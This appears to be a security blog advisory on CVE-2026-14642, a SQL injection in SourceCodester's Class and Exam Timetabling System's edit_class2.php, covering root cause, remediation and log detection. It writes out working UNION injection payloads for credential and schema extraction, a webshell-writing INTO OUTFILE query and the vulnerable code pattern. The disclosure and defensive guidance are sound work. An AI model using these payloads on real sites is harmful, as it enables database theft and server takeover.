Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsTraining
StudyProjectsNewsletterHire MeAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Training
Study
Projects
Newsletter
Hire Me
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

1794+ Articles
149+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Checklists
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-14642: Remote SQL Injection in SourceCodester Timetabling System edit_class2.php
CVE-2026-14642: Remote SQL Injection in SourceCodester Timetabling System edit_class2.php
SECURITYHIGHCVE-2026-14642

CVE-2026-14642: Remote SQL Injection in SourceCodester Timetabling System edit_class2.php

A high-severity SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0 allows unauthenticated remote attackers to fully compromise the database via the ID parameter in edit_class2.php. A public exploit PoC has been published.

Dylan H.

Security Team

July 5, 2026
5 min read

Affected Products

  • SourceCodester Class and Exam Timetabling System 1.0
  • /edit_class2.php — ID parameter
  • PHP/MySQL web applications on shared hosting

Executive Summary

CVE-2026-14642 is a high-severity SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0, identical in class to its sibling CVE-2026-14641 but affecting a different file: edit_class2.php. The ID GET parameter is passed directly into a SQL query without sanitization, allowing any unauthenticated remote attacker to exfiltrate the full database. A public proof-of-concept exploit has been published.

CVSS Score: 7.3 (High)

Both CVE-2026-14641 and CVE-2026-14642 exist in the same application, indicating a systemic absence of parameterized queries throughout the codebase. All SourceCodester Timetabling System deployments should be treated as compromised until patched.


Vulnerability Overview

Root Cause

The edit_class2.php script directly interpolates the id GET parameter into a SQL query:

// Vulnerable pattern (simplified)
$id = $_GET['id'];
$query = "SELECT * FROM class WHERE id = $id";
$result = mysqli_query($conn, $query);

This is the same root cause as CVE-2026-14641 — no input sanitization, no parameterized queries, and no authentication gate on the endpoint.

Attack Surface

ComponentDetail
EndpointGET /edit_class2.php?id=<payload>
Auth RequiredNone — fully unauthenticated
Injection TypeUNION-based and boolean-blind SQL injection
DatabaseMySQL
ImpactFull database dump, auth bypass, data manipulation
Public PoCYes — published alongside CVE-2026-14641

Relationship to CVE-2026-14641

These two CVEs were disclosed simultaneously and represent a pattern of insecure development across the SourceCodester timetabling application:

CVEFileTable Targeted
CVE-2026-14641edit_course.phpcourses table
CVE-2026-14642edit_class2.phpclass table

Both are remotely exploitable without authentication. Operators should audit all GET/POST parameters across the application for the same pattern.

Attack Chain

1. Attacker scans for SourceCodester timetabling installations (Shodan/Fofa)
2. Sends crafted GET request to /edit_class2.php?id= with UNION payload
3. Application concatenates raw input into MySQL query
4. UNION SELECT retrieves usernames and password hashes from users table
5. Attacker performs offline hash cracking (MD5 without salt is common)
6. Admin session established — full application control
7. Possible pivot: file write via INTO OUTFILE if MySQL permissions allow

Technical Details

Manual SQL Injection

# Test for injection
GET /edit_class2.php?id=1'
# Response: MySQL syntax error confirms injection

# Column enumeration
GET /edit_class2.php?id=1 ORDER BY 10--
# Reduce until no error to determine column count

# Credential extraction
GET /edit_class2.php?id=-1 UNION SELECT 1,username,password,4 FROM users--

Database Schema Enumeration

# List all databases
GET /edit_class2.php?id=-1 UNION SELECT 1,schema_name,3,4 
  FROM information_schema.schemata--

# List tables in target DB
GET /edit_class2.php?id=-1 UNION SELECT 1,table_name,3,4
  FROM information_schema.tables
  WHERE table_schema=database()--

Potential for File Write (If MySQL Has FILE Privilege)

-- Write PHP webshell if MySQL user has FILE privilege
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php'

This escalates SQL injection to full Remote Code Execution when the MySQL service account has elevated OS privileges.


Systemic Risk Assessment

SourceCodester applications are widely deployed by students, academic institutions, and small businesses in developing regions. The pattern of direct query interpolation appears in many of their free PHP scripts. The risks include:

RiskDetail
Student PIINames, student IDs, schedules, enrollment data
Faculty CredentialsEmail addresses, password hashes
Administrative AccessFull application takeover via credential theft
Lateral MovementShared hosting environments may expose other sites

Remediation

Immediate: Parameterized Queries

// SECURE: Bind the id as an integer parameter
$stmt = $conn->prepare("SELECT * FROM class WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();

Require Authentication on Edit Endpoints

// Add session check at the top of edit_class2.php
session_start();
if (!isset($_SESSION['user_id'])) {
    header('Location: login.php');
    exit;
}

Restrict MySQL File Privileges

-- Revoke FILE privilege from application DB user
REVOKE FILE ON *.* FROM 'appuser'@'localhost';
FLUSH PRIVILEGES;

Full Application Audit

Given both CVE-2026-14641 and CVE-2026-14642 exist in the same application, assume the pattern is widespread. Run a full audit:

# Find all direct GET/POST parameter usage in SQL queries
grep -rn "\$_GET\|\$_POST\|\$_REQUEST" . --include="*.php" | \
  grep -i "query\|sql\|mysqli_query\|mysql_query"

Detection

Web Log Analysis

# Detect UNION-based injection attempts
grep -E "edit_class2\.php.*id=.*(UNION|SELECT|ORDER BY|--)" \
  /var/log/nginx/access.log
 
# Detect error-based probing (single quote injection)
grep -E "edit_class2\.php.*id=.*%27" /var/log/nginx/access.log

Indicators of Compromise

  • Unexpected admin account creation in the users table
  • PHP files appearing in the web root not present in source control
  • MySQL slow log showing UNION SELECT patterns
  • Access to information_schema tables from the application user

References

  • NVD — CVE-2026-14642
  • NVD — CVE-2026-14641 (Sibling Vulnerability)
  • SourceCodester
  • OWASP SQL Injection Prevention Cheat Sheet

Related Reading

  • CVE-2026-14641: SQL Injection in edit_course.php — Same Timetabling System
  • CVE-2026-14637: PHP Deserialization RCE in CodeIgniter Ecommerce Bootstrap
#CVE#SQL Injection#SourceCodester#PHP#MySQL#High#Database

Related Articles

CVE-2026-14641: Remote SQL Injection in SourceCodester Class and Exam Timetabling System

A high-severity SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0 allows unauthenticated remote attackers to dump the full database by manipulating the ID parameter in edit_course.php. A public exploit PoC is available.

4 min read

CVE-2018-25362: Twitter-Clone SQL Injection via follow.php

Twitter-Clone 1 contains a high-severity SQL injection vulnerability in follow.php that allows attackers to extract sensitive database information through.

4 min read

CVE-2026-14771: SQL Injection in SourceCodester Class and Exam Timetabling System

An unauthenticated remote SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0 allows attackers to manipulate the id parameter in /edit_exam1.php. No patch is available — apply input sanitization immediately.

3 min read
Back to all Security Alerts